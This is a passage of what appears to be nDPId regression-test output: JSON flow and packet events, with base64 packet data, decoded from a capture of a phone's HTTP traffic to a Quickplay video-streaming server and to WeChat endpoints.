DT05UQUdJT05fMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfVFZYVjMyMFIyNDAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1kNzg4ZWRhZWY4ZDI0ZWQ0M2YyZTFiM2YwMWE2ZmI0NgojRVhULVgtU1RSRUFNLUlORjpQUk9HUkFNLUlEPTEsQkFORFdJRFRIPTY4OTU1MwpodHRwOi8vdm9kLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20vc2VnL3ZvbDEvcy9XYXJuZXIvcXBtZXp6aGF3a2RpZ2l0YWxjb250YWdpb24yMDU0MDMzZmVhdHVyZWVuZ2xpc2gyMGx0cnQyMzk3NmZwczc4MzQxOTIvMjAxNS0wMi0wMi9TVFY1MTBSMzYwL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjUxMFIzNjAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1hMWI3ZDFmNTY3NzYxMDNkNTU4OTU2YWQwYWY2YTU2Mw=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7560000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1429000049060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":583,"pkt_l4_len":547,"thread_ts_msec":1429000049060,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAjfkbUAAPwYF3wo2qfp4HCMoyycAUPhJNRwVgNsjUBgBybAbAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi1pbmRleC5tM3U4P2U9MTQyODk5OTY5OSZoPTgzZGEwNzg3NTkwYTdhNDUwMTYzYmJkN2E2Zjk3NGNhIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7560000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-index.m3u8?e=1428999699&h=83da0787590a7a450163bbd7a6f974ca","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1429000049272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000049272,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeTkfkAAPwYGIQo2qfp4HCMoyycAUPhJNysVgOaYUBgDEEglAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDAxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7560000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1429000050062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000050062,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZkAAPwZ8rwo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7560000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmsnssync","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +01938{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1429000051331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1152,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1152,"pkt_l4_len":1116,"thread_ts_msec":1429000051331,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBHAsp0AArAZOUHgcIygKNqn6AFDLJxWDzlj4STjnUBgIQ33VAAByqbIRKSnXO3n7wDbsfUk8e6VuWplgy2s+dhRInKblJDspkbYpMraIC2G\/R+GUD+2cHzU1WK917CgXy1UuWGNRG3nVdbmkpW6gXyTrK\/GWE44kpRkGnzPXCIHXPX744dGFJMegxO0qTCK1Fo6i3uEpacGLcKMMoyNpcaQHAYLI622xbJ8B36qbIZZWruxvDu7KIDG5e3mPu31z9S2QcHaVE4BE1tKVMaRT4CoWi1PkV85kYTw7+lXQj9CaQqhbKReGPL\/tcLMkyzZwE6IHJUK26PQvKyhEuU6GAQ+r9LcupqVlcd+NUyod+WhKMRAmSJil\/BRUsIdoudcrCIqRJzR5jVUoqyj\/ptMT5SVgA5N26bnxszCob1V6PGoSqrFbXGqUSFChkbSJKFRTCvxPDJYyRcjsMaoU12chr9o101HtsZqTm8Y5QbIAN7B8AVumqqy0fH9lTC67oIzCP4XCUFPOzmsTGixU55n8PiHFsO9k6FHgmL2Qpx9XZ7LZZq6kKLQZ6YEj4wSZ17X4PtdheB86DsQcq8hTQKwZ50xFXAuqOJAfjJ3Fwvpkhy0irBq+moIpZIUyDIXip19wI5TntRdQ6klOXxoMR4h+rkQF9NIWAZsF4N+T7NhEDH0IhJ+7C8yW\/XKrXV2QuHcZeah99tklt\/1RoCV3tlE3iI+9KsShs\/QYEoI2GuydlkjMnZTY8FZqf7NGoRzmtcyCTcSq7ihdZ8emY8+Em76YXV5DqpjEXAEAd6Ihi3wXtxe47OSDIzuYkFbw07vSe8r5pw+O8CvCFNmM+\/R5XtTzDC6jpCkjK2Ks4K8eO1sR7xVxwgkYKLOtWeJvnPFsHRpwPxtVG35fKrArPruPuT5oZOx\/pQJT9cFmcAl3RKKARXXxajyJ2qH50U92ABd9K3dq1HyFHG2aoh8ZR\/WT1vs31Bm0M7ATJhQL2l2m4hoGBonCWxZz758eNTp\/kC\/zRYgzH6m74xpGj038MxNX4to5jr+JtrVTP6loTNL8hf21+Z1vRJ8TKNwrI0CwNIptRF429nB7n+Pl6NrVJTHjMQt5IoQZRVlFDepGzD3fSDZZ4GjFo43mYzPMjWk0+FMIfnOvn6Gn8nXWwKtX1oF2fKKInSceON8GTZBwiFeJbBUg69aGCibPn5BkMxekscJXDNFdCB2xNetElbFYP+YoyUHk8ZsDR\/PLX1ywopxm9Q\/Py6arJrU3L+8wIopRGPUBVivuDfLh0pGSoWdpGKSTKIBICVrgSbSPdIgZjbfO0v4LLFX+kYV8QKziGFA\/WUp+nU5eMYE6UsEvLHeSktqvq0aUc+dVpxaKqVHlN+ect0oR9LY9MKkAeQsdVq1CuWDxS+xrJyD\/Uu+pp1IZey306exBm3ut4YWy7OXTRL0TOwdk6mtjCmzQzJRmtiRCxM7bjXgmi1lSWiwmYs4+DuYZWGKvtZHnnKOVsVmU8qj1T9ly"} +01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1429000051366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000051366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZ0AAPwZ8rgo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} +00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1429000052145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":145,"pkt_l4_len":109,"thread_ts_msec":1429000052145,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAIFK0UAArQZq68vNl6AKNqn6AFDWY3uzUB\/LAXbFUBgIIl2QAADLSVkFxdhO01jGkqqir\/4Pe\/qItPtTf6ajYud7yQvoMcf18CvkFV3iH59UBVcusMzzLrB7pfuUH4Sme9ekIxa0n3Xkcqj9Zb8GTsGgT4pSgGI1jIGtnmYZvw=="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7560000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01051{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1429000052217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000052217,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjSUAAPwaHVgo2qfp4HCMoyykAUHABsefLT2i4UBgBySAFAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIwLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} +01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7560000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7560000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1429000052348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":380,"pkt_l4_len":344,"thread_ts_msec":1429000052348,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWw6SUAAPwb+3wo2qfrLzYFlpwkAUDA+6IKRcovGUBgAblluAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1iYXRjaGVtb2ppZG93bmxvYWQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiA0OQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCoZfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwC5BQICxN0BAmqbBe97kd9DUUv3xZ4Sxtk="} +00840{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7560000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmbatchemojidownload","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7560000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01001{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1429000052350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":461,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":461,"pkt_l4_len":425,"thread_ts_msec":1429000052350,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAb2qTEAAPwZ4UAo2qfrLzZeg1mUAUE+SeI3XHwqaUBgAbsqdAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vZ2V0Y29udGFjdGxhYmVsbGlzdCBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDEzMA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNColfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwD\/BNABUsTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYeQoz6VrtJH00pu+gvbU58lmESj2o4D7TnERbmXXALCqM="} +00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7560000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/getcontactlabellist","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1429000052688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000052688,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPWIBEAArAZEf8vNgWUKNqn6AFCnCZFyi8YwPunGUBgIIppgAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwC5BQwMAADES8+zVe2SBL6tUVxA2Vh6"} +00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1429000053611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000053611,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYEAArQar6MvNl6AKNqn6AFDWZdcfCppPknoiUBgIIrzYAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} +02362{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1429000054555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000054555,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaBrnEAArQYNK3gcIygKNqn6AFDLKctRyGZwAbOjUBAIIjnpAAC6eiaRjUv\/RPkOH82F5WosK669TTY41gIXUb5TM31DDCidAN9BA2XuM3HL8T4H8RaooiwzYVX\/NyYQvgJwozgBs+HWQERJo3j\/tFsg+NsbehQ2yqZ0ni5IF772nmOTUjjTqhvSyTYKL8LPX7\/SbJuUeesyVlCo1rcZrFyvobivL2QselZVKbZT9oXnVrTBXz9SgWOBGQjqM+6MYkHQqsKJwKvUzEiyfqsG7Y5ib\/HG3Cr61CWCOUzckjCo4x7\/2FXuS4bbTxyKoEXBeNcTCujBm4BW7TCl6yaZq2WXxGG4hvRF0Be\/m5kDX7D2ritov06P2eBHlozi8poVm+8iR+ps7ttJSDR9cRtIoZ6CzGQuMlpslQH3eGbKiA+TieQa5VKgPmn67A5ZHz6oVTfujJs8WKbjDDZ9Q0iRvNel4W1E1K\/\/zSVXoGcUMXf+jhnQwZpcpi1EdAnR+40BHo